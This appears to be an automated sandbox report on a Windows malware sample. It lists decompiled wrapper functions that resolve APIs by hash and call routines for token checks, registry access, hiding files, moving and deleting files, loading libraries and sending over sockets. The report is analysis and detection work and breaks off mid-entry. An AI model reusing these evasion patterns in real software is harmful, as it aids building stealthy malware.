                    • RegQueryValueExA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000009,00000009,FE9F661A,00000000,00000000), ref: 00404ABC
                    Memory Dump Source
                    • Source File: 00000002.00000001.292539548.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000002.00000001.292567867.00000000004A0000.00000040.00020000.sdmp Download File
                    Yara matches
                    Similarity
                    • API ID: Heap$AllocateOpenProcessQueryValue
                    • String ID:
                    • API String ID: 1425999871-0
                    • Opcode ID: bcb9612233ffeb4634d4995e45ab0b963c80d9ccd10657b8c49858d8039cb957
                    • Instruction ID: c751ae4fb1a51baa23b068920df28fa5e45e9ad9ad003da97b765f6d6e9ada80
                    • Opcode Fuzzy Hash: bcb9612233ffeb4634d4995e45ab0b963c80d9ccd10657b8c49858d8039cb957
                    • Instruction Fuzzy Hash: A301B1B264010C7EEB01AED69C86DBF7B2DDB81798B10003EF60475182EAB59E1156B9
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00402B7C, Relevance: 3.0, APIs: 2, Instructions: 20memoryCOMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E00402B7C(long _a4) {
				void* _t4;
				void* _t7;

				_t4 = RtlAllocateHeap(GetProcessHeap(), 0, _a4); // executed
				_t7 = _t4;
				if(_t7 != 0) {
					E00402B4E(_t7, 0, _a4);
				}
				return _t7;
			}





                    0x00402b8c
                    0x00402b92
                    0x00402b96
                    0x00402b9e
                    0x00402ba3
                    0x00402baa

                    APIs
                    • GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                    • RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                    Memory Dump Source
                    • Source File: 00000002.00000001.292539548.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000002.00000001.292567867.00000000004A0000.00000040.00020000.sdmp Download File
                    Yara matches
                    Similarity
                    • API ID: Heap$AllocateProcess
                    • String ID:
                    • API String ID: 1357844191-0
                    • Opcode ID: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
                    • Instruction ID: b98118a04cfb303fc975c2cf6dbcabe8739d57b69ee549b18d4bacd194132a09
                    • Opcode Fuzzy Hash: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
                    • Instruction Fuzzy Hash: 14D05E36A01A24B7CA212FD5AC09FCA7F2CEF48BE6F044031FB0CAA290D675D91047D9
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 004060BD, Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                    Download Yara Rule
                    C-Code - Quality: 40%
                    			E004060BD(void* __eflags) {
				signed int _v8;
				char _v12;
				short _v16;
				char _v20;
				void* __ebx;
				intOrPtr* _t12;
				signed int _t13;
				intOrPtr* _t14;
				signed int _t15;
				void* _t24;

				_v16 = 0x500;
				_v20 = 0;
				_t12 = E004031E5(0, 9, 0xf3a0c470, 0, 0);
				_t13 =  *_t12( &_v20, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v12);
				_v8 = _t13;
				if(_t13 != 0) {
					_t14 = E004031E5(0, 9, 0xe3b938df, 0, 0);
					_t15 =  *_t14(0, _v12,  &_v8, _t24); // executed
					asm("sbb eax, eax");
					_v8 = _v8 &  ~_t15;
					E0040604F(_v12);
					return _v8;
				}
				return _t13;
			}













                    0x004060c6
                    0x004060d5
                    0x004060d8
                    0x004060f4
                    0x004060f6
                    0x004060fb
                    0x0040610a
                    0x00406115
                    0x0040611c
                    0x0040611e
                    0x00406121
                    0x00000000
                    0x0040612a
                    0x0040612f

                    APIs
                    • CheckTokenMembership.KERNELBASE(00000000,00000000,00000000,00000009,E3B938DF,00000000,00000000,00000001), ref: 00406115
                    Memory Dump Source
                    • Source File: 00000002.00000001.292539548.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000002.00000001.292567867.00000000004A0000.00000040.00020000.sdmp Download File
                    Yara matches
                    Similarity
                    • API ID: CheckMembershipToken
                    • String ID:
                    • API String ID: 1351025785-0
                    • Opcode ID: 4a43c4ed47dff20a0e63da0344eb6b70d0e7b4795f78c2e23bdd5dfdab477f71
                    • Instruction ID: 8b780b9e56efd5f2a9a2252a5f210822aeafba94d0ba5a8497d60ad8274f78a0
                    • Opcode Fuzzy Hash: 4a43c4ed47dff20a0e63da0344eb6b70d0e7b4795f78c2e23bdd5dfdab477f71
                    • Instruction Fuzzy Hash: 7801867195020DBEEB00EBE59C86EFFB77CEF08208F100569B515B60C2EA75AF008764
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00403C62, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E00403C62(void* __ebx, void* __eflags, WCHAR* _a4) {
				void* _t3;
				int _t5;

				_t3 = E00403D4D(__eflags, _a4); // executed
				if(_t3 == 0) {
					__eflags = 0;
					E004031E5(__ebx, 0, 0xc8f0a74d, 0, 0);
					_t5 = CreateDirectoryW(_a4, 0); // executed
					return _t5;
				} else {
					return 1;
				}
			}





                    0x00403c68
                    0x00403c70
                    0x00403c78
                    0x00403c82
                    0x00403c8b
                    0x00403c8f
                    0x00403c72
                    0x00403c76
                    0x00403c76

                    APIs
                    • CreateDirectoryW.KERNELBASE(00413D1F,00000000,00000000,C8F0A74D,00000000,00000000,00000000,?,00413D1F,00000000), ref: 00403C8B
                    Memory Dump Source
                    • Source File: 00000002.00000001.292539548.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000002.00000001.292567867.00000000004A0000.00000040.00020000.sdmp Download File
                    Yara matches
                    Similarity
                    • API ID: CreateDirectory
                    • String ID:
                    • API String ID: 4241100979-0
                    • Opcode ID: d413ab25134c4b1c761ae7c40b175d3f6038492197e92d4c0305fa2d5b60993a
                    • Instruction ID: 8def336d827aa123259dd30fe2d1f4df156212ecddfe904d71fbacf529eca846
                    • Opcode Fuzzy Hash: d413ab25134c4b1c761ae7c40b175d3f6038492197e92d4c0305fa2d5b60993a
                    • Instruction Fuzzy Hash: 47D05E320450687A9A202AA7AC08CDB3E0DDE032FA7004036B81CE4052DB26861191E4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0040642C, Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                    Download Yara Rule
                    C-Code - Quality: 37%
                    			E0040642C(void* __eflags) {
				short _v40;
				intOrPtr* _t6;
				void* _t10;

				_t6 = E004031E5(_t10, 0, 0xe9af4586, 0, 0);
				 *_t6( &_v40); // executed
				return 0 | _v40 == 0x00000009;
			}






                    0x0040643c
                    0x00406445
                    0x00406454

                    APIs
                    • GetNativeSystemInfo.KERNELBASE(?,00000000,E9AF4586,00000000,00000000,?,?,?,?,004144CF,00000000,00000000,00000000,00000000), ref: 00406445
                    Memory Dump Source
                    • Source File: 00000002.00000001.292539548.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000002.00000001.292567867.00000000004A0000.00000040.00020000.sdmp Download File
                    Yara matches
                    Similarity
                    • API ID: InfoNativeSystem
                    • String ID:
                    • API String ID: 1721193555-0
                    • Opcode ID: 18b792e9f3ed795f2423495cf2abf5b642ecf28d7d26812d11fe043f37d9eb75
                    • Instruction ID: 89a273ea7bbabd9d74fc824e7d15e3b55fbc967ee531cdb223f62f0d5b23fb21
                    • Opcode Fuzzy Hash: 18b792e9f3ed795f2423495cf2abf5b642ecf28d7d26812d11fe043f37d9eb75
                    • Instruction Fuzzy Hash: 60D0C9969142082A9B24FEB14E49CBB76EC9A48104B400AA8FC05E2180FD6ADF5482A5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00404EEA, Relevance: 1.5, APIs: 1, Instructions: 16networkCOMMON
                    Download Yara Rule
                    C-Code - Quality: 37%
                    			E00404EEA(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _t5;

				_t5 = _a12;
				if(_t5 == 0) {
					_t5 = E00405D0B(_a8) + 1;
				}
				__imp__#19(_a4, _a8, _t5, 0); // executed
				return _t5;
			}




                    0x00404eed
                    0x00404ef2
                    0x00404efd
                    0x00404efd
                    0x00404f07
                    0x00404f0e

                    APIs
                    • send.WS2_32(00000000,00000000,00000000,00000000,?,0041411D,00000000,00000000,00000000,00000000), ref: 00404F07
                    Memory Dump Source
                    • Source File: 00000002.00000001.292539548.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000002.00000001.292567867.00000000004A0000.00000040.00020000.sdmp Download File
                    Yara matches
                    Similarity
                    • API ID: send
                    • String ID:
                    • API String ID: 2809346765-0
                    • Opcode ID: f5f37575630baef1eb429ccea87373dc8bd2737f5fb4b11d46726e1bb86e5636
                    • Instruction ID: 973ad19c2726000f66dbac5dad6f1ecaf56acd36cc9bde1755ab86a88c27f217
                    • Opcode Fuzzy Hash: f5f37575630baef1eb429ccea87373dc8bd2737f5fb4b11d46726e1bb86e5636
                    • Instruction Fuzzy Hash: F8D09231140209BBEF016E55EC05BAA3B69EF44B54F10C026BA18991A1DB31A9219A98
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00403BD0, Relevance: 1.5, APIs: 1, Instructions: 14COMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E00403BD0(WCHAR* _a4, WCHAR* _a8, long _a12) {
				int _t6;
				void* _t7;

				E004031E5(_t7, 0, 0xc9143177, 0, 0);
				_t6 = MoveFileExW(_a4, _a8, _a12); // executed
				return _t6;
			}





                    0x00403bdd
                    0x00403beb
                    0x00403bee

                    APIs
                    • MoveFileExW.KERNELBASE(00000000,00412C16,?,00000000,C9143177,00000000,00000000,?,004040B6,00000000,00412C16,00000001,?,00412C16,00000000,00000000), ref: 00403BEB
                    Memory Dump Source
                    • Source File: 00000002.00000001.292539548.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000002.00000001.292567867.00000000004A0000.00000040.00020000.sdmp Download File
                    Yara matches
                    Similarity
                    • API ID: FileMove
                    • String ID:
                    • API String ID: 3562171763-0
                    • Opcode ID: 7a0bb135e6e1f0606704ed46507384a8cac74e7a8e8860f1f6d7d5715d4ca302
                    • Instruction ID: 27267517ebbd606c040c475238707358b0366275ca1c9c11413b547716cf2561
                    • Opcode Fuzzy Hash: 7a0bb135e6e1f0606704ed46507384a8cac74e7a8e8860f1f6d7d5715d4ca302
                    • Instruction Fuzzy Hash: 5AC04C7500424C7FEF026EF19D05C7B3F5EEB49618F448825BD18D5421DA37DA216664
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00404DF3, Relevance: 1.5, APIs: 1, Instructions: 13networkCOMMON
                    Download Yara Rule
                    APIs
                    • WSAStartup.WS2_32(00000202,?), ref: 00404E08
                    Memory Dump Source
                    • Source File: 00000002.00000001.292539548.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000002.00000001.292567867.00000000004A0000.00000040.00020000.sdmp Download File
                    Yara matches
                    Similarity
                    • API ID: Startup
                    • String ID:
                    • API String ID: 724789610-0
                    • Opcode ID: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
                    • Instruction ID: edfb6e6a7b2c2d2c81179f298452045bbfcf768a57aceb16f5d93ae35c4528ea
                    • Opcode Fuzzy Hash: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
                    • Instruction Fuzzy Hash: 6EC08C32AA421C9FD750AAB8AD0FAF0B7ACD30AB02F0002B56E1DC60C1E550582906E2
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0040427D, Relevance: 1.5, APIs: 1, Instructions: 13COMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E0040427D(WCHAR* _a4) {
				int _t4;
				void* _t5;

				E004031E5(_t5, 0, 0xcac5886e, 0, 0);
				_t4 = SetFileAttributesW(_a4, 0x2006); // executed
				return _t4;
			}





                    0x0040428a
                    0x00404297
                    0x0040429a

                    APIs
                    • SetFileAttributesW.KERNELBASE(00000000,00002006,00000000,CAC5886E,00000000,00000000,?,00412C3B,00000000,00000000,?), ref: 00404297
                    Memory Dump Source
                    • Source File: 00000002.00000001.292539548.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000002.00000001.292567867.00000000004A0000.00000040.00020000.sdmp Download File
                    Yara matches
                    Similarity
                    • API ID: AttributesFile
                    • String ID:
                    • API String ID: 3188754299-0
                    • Opcode ID: 8dd52a8075b7bef316d0fc581140073ef821e073e46509cdb91d5efed9f2b539
                    • Instruction ID: e837d3b0865cda380a04769d40cc561620ee701a25bf2a33446201ee5459e2a9
                    • Opcode Fuzzy Hash: 8dd52a8075b7bef316d0fc581140073ef821e073e46509cdb91d5efed9f2b539
                    • Instruction Fuzzy Hash: A9C092B054430C3EFA102EF29D4AD3B3A8EEB41648B008435BE08E9096E977DE2061A8
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00404A19, Relevance: 1.5, APIs: 1, Instructions: 13registryCOMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E00404A19(void* _a4, short* _a8, void** _a12) {
				long _t5;
				void* _t6;

				E004031E5(_t6, 9, 0xdb552da5, 0, 0);
				_t5 = RegOpenKeyW(_a4, _a8, _a12); // executed
				return _t5;
			}





                    0x00404a27
                    0x00404a35
                    0x00404a38

                    APIs
                    • RegOpenKeyW.ADVAPI32(?,?,?,00000009,DB552DA5,00000000,00000000), ref: 00404A35
                    Memory Dump Source
                    • Source File: 00000002.00000001.292539548.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000002.00000001.292567867.00000000004A0000.00000040.00020000.sdmp Download File
                    Yara matches
                    Similarity
                    • API ID: Open
                    • String ID:
                    • API String ID: 71445658-0
                    • Opcode ID: 878e79dc60d56a32ccce77cf818dc40cd176942d244c38d6301a2c771aeba921
                    • Instruction ID: b1d3f25f69c2166d3d07fcddbc0993e3b6974a4a806b5379996ceb22213e89af
                    • Opcode Fuzzy Hash: 878e79dc60d56a32ccce77cf818dc40cd176942d244c38d6301a2c771aeba921
                    • Instruction Fuzzy Hash: 5BC012311802087FFF012EC1CC02F483E1AAB08B55F044011BA18280E1EAB3A2205658
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00403C40, Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E00403C40(void* _a4) {
				int _t4;
				void* _t5;

				E004031E5(_t5, 0, 0xfbce7a42, 0, 0);
				_t4 = FindCloseChangeNotification(_a4); // executed
				return _t4;
			}





                    0x00403c4d
                    0x00403c55
                    0x00403c58

                    APIs
                    • FindCloseChangeNotification.KERNELBASE(00000000,00000000,FBCE7A42,00000000,00000000,?,00404344,00000000,?,?,004146E2,00000000,00000000,?,00000000,00000000), ref: 00403C55
                    Memory Dump Source
                    • Source File: 00000002.00000001.292539548.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000002.00000001.292567867.00000000004A0000.00000040.00020000.sdmp Download File
                    Yara matches
                    Similarity
                    • API ID: ChangeCloseFindNotification
                    • String ID:
                    • API String ID: 2591292051-0
                    • Opcode ID: 67fd61e36e72385b159b193fd7e1560e83aa445b7d913ea69a34d34039b65f78
                    • Instruction ID: f60e35b61e15034c3e7e350ceef27d37971f1a6745175d5827dd76012fe363c0
                    • Opcode Fuzzy Hash: 67fd61e36e72385b159b193fd7e1560e83aa445b7d913ea69a34d34039b65f78
                    • Instruction Fuzzy Hash: 70B092B01182087EAE006AF29C05C3B3E4ECA4060874094267C08E5451F937DF2014B4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00403C08, Relevance: 1.5, APIs: 1, Instructions: 12fileCOMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E00403C08(WCHAR* _a4) {
				int _t4;
				void* _t5;

				E004031E5(_t5, 0, 0xdeaa357b, 0, 0);
				_t4 = DeleteFileW(_a4); // executed
				return _t4;
			}





                    0x00403c15
                    0x00403c1d
                    0x00403c20

                    APIs
                    • DeleteFileW.KERNELBASE(?,00000000,DEAA357B,00000000,00000000), ref: 00403C1D
                    Memory Dump Source
                    • Source File: 00000002.00000001.292539548.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000002.00000001.292567867.00000000004A0000.00000040.00020000.sdmp Download File
                    Yara matches
                    Similarity
                    • API ID: DeleteFile
                    • String ID:
                    • API String ID: 4033686569-0
                    • Opcode ID: 01b23650ea3b3ad0b7ef3e64b7b20365c040140a899dd4cba48e3dfa7394e9f1
                    • Instruction ID: 5639c68ad781144a2d68ff400f656d3d2c658e81fc8059c2e96e04b5885f7932
                    • Opcode Fuzzy Hash: 01b23650ea3b3ad0b7ef3e64b7b20365c040140a899dd4cba48e3dfa7394e9f1
                    • Instruction Fuzzy Hash: EDB092B04082093EAA013EF59C05C3B3E4DDA4010870048257D08E6111EA36DF1010A8
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00402C1F, Relevance: 1.5, APIs: 1, Instructions: 12libraryCOMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E00402C1F(WCHAR* _a4) {
				struct HINSTANCE__* _t4;
				void* _t5;

				E004031E5(_t5, 0, 0xe811e8d4, 0, 0);
				_t4 = LoadLibraryW(_a4); // executed
				return _t4;
			}





                    0x00402c2c
                    0x00402c34
                    0x00402c37

                    APIs
                    • LoadLibraryW.KERNELBASE(?,00000000,E811E8D4,00000000,00000000), ref: 00402C34
                    Memory Dump Source
                    • Source File: 00000002.00000001.292539548.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000002.00000001.292567867.00000000004A0000.00000040.00020000.sdmp Download File
                    Yara matches
                    Similarity
                    • API ID: LibraryLoad
                    • String ID:
                    • API String ID: 1029625771-0
                    • Opcode ID: af34b662912c89fdb3a0f1b9ff73cd040c3e05ef601eeab43baa4f39a88cbda5
                    • Instruction ID: cd53f9395925d29cf68d66af6aae64644fca58afce9bbcd5edfe8b9605b00cd0
                    • Opcode Fuzzy Hash: af34b662912c89fdb3a0f1b9ff73cd040c3e05ef601eeab43baa4f39a88cbda5
                    • Instruction Fuzzy Hash: C9B092B00082083EAA002EF59C05C7F3A4DDA4410874044397C08E5411F937DE1012A5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00403BEF, Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E00403BEF(void* _a4) {
				int _t4;
				void* _t5;

				E004031E5(_t5, 0, 0xda6ae59a, 0, 0);
				_t4 = FindClose(_a4); // executed
				return _t4;
			}





                    0x00403bfc
                    0x00403c04
                    0x00403c07

                    APIs
                    • FindClose.KERNELBASE(00403F8D,00000000,DA6AE59A,00000000,00000000,?,00403F8D,00000000), ref: 00403C04
                    Memory Dump Source
                    • Source File: 00000002.00000001.292539548.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000002.00000001.292567867.00000000004A0000.00000040.00020000.sdmp Download File
                    Yara matches
                    Similarity
                    • API ID: CloseFind
                    • String ID:
                    • API String ID: 1863332320-0
                    • Opcode ID: 9873c53fda05388afb850746851f5e32e8254642b63e91831ef49aacf0f87411
                    • Instruction ID: 1ebc74916e7009c76bd4f38d62a0f1d2d6d24e136e2668fcc01a71b48f24aa02
                    • Opcode Fuzzy Hash: 9873c53fda05388afb850746851f5e32e8254642b63e91831ef49aacf0f87411
                    • Instruction Fuzzy Hash: FDB092B00442087EEE002EF1AC05C7B3F4EDA4410970044257E0CE5012E937DF1010B4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00403BB7, Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E00403BB7(WCHAR* _a4) {
				long _t4;
				void* _t5;

				E004031E5(_t5, 0, 0xc6808176, 0, 0);
				_t4 = GetFileAttributesW(_a4); // executed
				return _t4;
			}





                    0x00403bc4
                    0x00403bcc
                    0x00403bcf

                    APIs
                    • GetFileAttributesW.KERNELBASE(00413D1F,00000000,C6808176,00000000,00000000,?,00403D58,00413D1F,?,00403C6D,00413D1F,?,00413D1F,00000000), ref: 00403BCC
                    Memory Dump Source
                    • Source File: 00000002.00000001.292539548.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000002.00000001.292567867.00000000004A0000.00000040.00020000.sdmp Download File
                    Yara matches
                    Similarity
                    • API ID: AttributesFile
                    • String ID:
                    • API String ID: 3188754299-0
                    • Opcode ID: 1d6dd25f7c332fd1d35fbf5985813ee51de81cf8f6e5d0f963c2f0c9ec148b39
                    • Instruction ID: 12c622a32f4ce0ce5baf48af10e49973588d22e73ecb696d4958cc4f11b8a016
                    • Opcode Fuzzy Hash: 1d6dd25f7c332fd1d35fbf5985813ee51de81cf8f6e5d0f963c2f0c9ec148b39
                    • Instruction Fuzzy Hash: D2B092B05042083EAE012EF19C05C7B3A6DCA40148B4088297C18E5111ED36DE5050A4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 004049FF, Relevance: 1.5, APIs: 1, Instructions: 11registryCOMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E004049FF(void* _a4) {
				long _t3;
				void* _t4;

				E004031E5(_t4, 9, 0xd980e875, 0, 0);
				_t3 = RegCloseKey(_a4); // executed
				return _t3;
			}





                    0x00404a0d
                    0x00404a15
                    0x00404a18

                    APIs
                    • RegCloseKey.KERNELBASE(00000000,00000009,D980E875,00000000,00000000,?,00404A44,?,?,00404AC6,?), ref: 00404A15
                    Memory Dump Source
                    • Source File: 00000002.00000001.292539548.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000002.00000001.292567867.00000000004A0000.00000040.00020000.sdmp Download File
                    Yara matches
                    Similarity
                    • API ID: Close
                    • String ID:
                    • API String ID: 3535843008-0
                    • Opcode ID: a61027cf4d9072e61279d4b4f16a9571f3d05446971c54f2b184413104fd85b7
                    • Instruction ID: 75bcc15c4d71fff8019d16f1d9debb39272117f3de5fdcc107556e34aff8dcac
                    • Opcode Fuzzy Hash: a61027cf4d9072e61279d4b4f16a9571f3d05446971c54f2b184413104fd85b7
                    • Instruction Fuzzy Hash: 7CC092312843087AEA102AE2EC0BF093E0D9B41F98F500025B61C3C1D2E9E3E6100099
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00403B64, Relevance: 1.5, APIs: 1, Instructions: 11COMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E00403B64(WCHAR* _a4) {
				int _t3;
				void* _t4;

				E004031E5(_t4, 2, 0xdc0853e1, 0, 0);
				_t3 = PathFileExistsW(_a4); // executed
				return _t3;
			}





                    0x00403b72
                    0x00403b7a
                    0x00403b7d

                    APIs
                    • PathFileExistsW.KERNELBASE(?,00000002,DC0853E1,00000000,00000000), ref: 00403B7A
                    Memory Dump Source
                    • Source File: 00000002.00000001.292539548.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000002.00000001.292567867.00000000004A0000.00000040.00020000.sdmp Download File
                    Yara matches
                    Similarity
                    • API ID: ExistsFilePath
                    • String ID:
                    • API String ID: 1174141254-0
                    • Opcode ID: 79b415000e3dec3248a6d2155c6771fe406342b29d1d2faf8e1af97ba013cdd8
                    • Instruction ID: 8bd75bc93bbce64143a6918826fd0663652f5dbe7ab318808702af7ec0dd126f
                    • Opcode Fuzzy Hash: 79b415000e3dec3248a6d2155c6771fe406342b29d1d2faf8e1af97ba013cdd8
                    • Instruction Fuzzy Hash: F4C0923028830C3BF9113AD2DC47F197E8D8B41B99F104025B70C3C4D2D9E3A6100199
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00404DE5, Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                    Download Yara Rule
                    APIs
                    • closesocket.WS2_32(00404EB0,?,00404EB0,00000000), ref: 00404DEB
                    Memory Dump Source
                    • Source File: 00000002.00000001.292539548.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000002.00000001.292567867.00000000004A0000.00000040.00020000.sdmp Download File
                    Yara matches
                    Similarity
                    • API ID: closesocket
                    • String ID:
                    • API String ID: 2781271927-0
                    • Opcode ID: 887654383893d56b64fc04469bc98b787ac4c367861e76a9ad562a01a17cc3aa
                    • Instruction ID: a7719220e23c04317d26723f710bfa070304820e6d91f105ed764937a1a9d613
                    • Opcode Fuzzy Hash: 887654383893d56b64fc04469bc98b787ac4c367861e76a9ad562a01a17cc3aa
                    • Instruction Fuzzy Hash: F4A0113000020CEBCB002B82EE088C83F2CEA882A0B808020F80C00020CB22A8208AC8
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00403F9E, Relevance: 1.3, APIs: 1, Instructions: 16COMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E00403F9E(void* _a4) {
				int _t3;
				void* _t4;

				E004031E5(_t4, 0, 0xf53ecacb, 0, 0);
				_t3 = VirtualFree(_a4, 0, 0x8000); // executed
				return _t3;
			}





                    0x00403fac
                    0x00403fba
                    0x00403fbe

                    APIs
                    • VirtualFree.KERNELBASE(?,00000000,00008000,00000000,F53ECACB,00000000,00000000), ref: 00403FBA
                    Memory Dump Source
                    • Source File: 00000002.00000001.292539548.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000002.00000001.292567867.00000000004A0000.00000040.00020000.sdmp Download File
                    Yara matches
                    Similarity
                    • API ID: FreeVirtual
                    • String ID:
                    • API String ID: 1263568516-0
                    • Opcode ID: 4437192c676a59da206b473fb72d9d26ef1781d862ceba0a26f5730449a5d479
                    • Instruction ID: 31a36aa897feec3f2575a3818ba469950b8b51fe97d839facc05156de448dee4
                    • Opcode Fuzzy Hash: 4437192c676a59da206b473fb72d9d26ef1781d862ceba0a26f5730449a5d479
                    • Instruction Fuzzy Hash: 9CC08C3200613C32893069DBAC0AFCB7E0CDF036F4B104021F50C6404049235A0186F8
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00406472, Relevance: 1.3, APIs: 1, Instructions: 12sleepCOMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E00406472(long _a4) {
				void* _t3;
				void* _t4;

				_t3 = E004031E5(_t4, 0, 0xcfa329ad, 0, 0);
				Sleep(_a4); // executed
				return _t3;
			}





                    0x0040647f
                    0x00406487
                    0x0040648a

                    APIs
                    • Sleep.KERNELBASE(?,00000000,CFA329AD,00000000,00000000), ref: 00406487
                    Memory Dump Source
                    • Source File: 00000002.00000001.292539548.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000002.00000001.292567867.00000000004A0000.00000040.00020000.sdmp Download File
                    Yara matches
                    Similarity
                    • API ID: Sleep
                    • String ID:
                    • API String ID: 3472027048-0
                    • Opcode ID: 1807eaeb392d941871dd7f4dce37bd4a7f558bd6a955fa7349a6f4d515d7796f
                    • Instruction ID: 8d08050a97d9600d7c0dbf2a5018eca7d85037e123ae0040efa9f3f0a7dd9c36
                    • Opcode Fuzzy Hash: 1807eaeb392d941871dd7f4dce37bd4a7f558bd6a955fa7349a6f4d515d7796f
                    • Instruction Fuzzy Hash: FBB092B08082083EEA002AF1AD05C3B7A8DDA4020870088257C08E5011E93ADE1150B9
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 004058EA, Relevance: 1.3, APIs: 1, Instructions: 12COMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E004058EA(char* _a4, char* _a8) {
				char* _t4;
				void* _t5;

				E004031E5(_t5, 2, 0xc5c16604, 0, 0);
				_t4 = StrStrA(_a4, _a8); // executed
				return _t4;
			}





                    0x004058f8
                    0x00405903
                    0x00405906

                    APIs
                    • StrStrA.KERNELBASE(?,?,00000002,C5C16604,00000000,00000000), ref: 00405903
                    Memory Dump Source
                    • Source File: 00000002.00000001.292539548.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000002.00000001.292567867.00000000004A0000.00000040.00020000.sdmp Download File
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 042642b6324743061f7cb6dcc4248db4a99ff7c1e794a59b5538058313c095a3
                    • Instruction ID: d5512459148ba4630ff55d530b0b04b7b8071b1588054f6e556ec5c474e97d6d
                    • Opcode Fuzzy Hash: 042642b6324743061f7cb6dcc4248db4a99ff7c1e794a59b5538058313c095a3
                    • Instruction Fuzzy Hash: 82C04C3118520876EA112AD19C07F597E1D9B45B68F108425BA1C6C4D19AB3A6505559
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00405924, Relevance: 1.3, APIs: 1, Instructions: 12COMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E00405924(WCHAR* _a4, WCHAR* _a8) {
				WCHAR* _t4;
				void* _t5;

				E004031E5(_t5, 2, 0xd6865bd4, 0, 0);
				_t4 = StrStrW(_a4, _a8); // executed
				return _t4;
			}





                    0x00405932
                    0x0040593d
                    0x00405940

                    APIs
                    • StrStrW.KERNELBASE(?,?,00000002,D6865BD4,00000000,00000000), ref: 0040593D
                    Memory Dump Source
